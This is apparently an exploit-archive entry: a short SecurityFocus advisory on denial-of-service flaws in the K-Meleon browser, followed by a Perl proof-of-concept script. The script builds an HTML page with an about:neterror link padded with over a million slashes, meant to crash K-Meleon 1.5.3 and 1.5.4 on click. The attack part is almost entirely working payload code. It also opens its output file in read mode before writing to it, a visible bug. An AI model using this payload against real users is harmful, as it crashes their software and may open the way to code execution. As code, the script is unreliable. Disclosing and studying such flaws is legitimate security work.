source: https://www.securityfocus.com/bid/42200/info K-Meleon is prone to multiple denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code; this has not been confirmed. ####################################################################### #!/usr/bin/perl # k-meleon Long "a href" Link DoS # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com # k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS # generate the file open it with k-keleon click in the link and wait a seconds ###################################################################### $archivo = $ARGV[0]; if(!defined($archivo)) { print "Usage: $0 <archivo.html>\n"; } $cabecera = "<html>" . "\n"; $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n"; $fin = "</html>"; $datos = $cabecera . $payload . $fin; open(FILE, '<' . $archivo); print FILE $datos; close(FILE);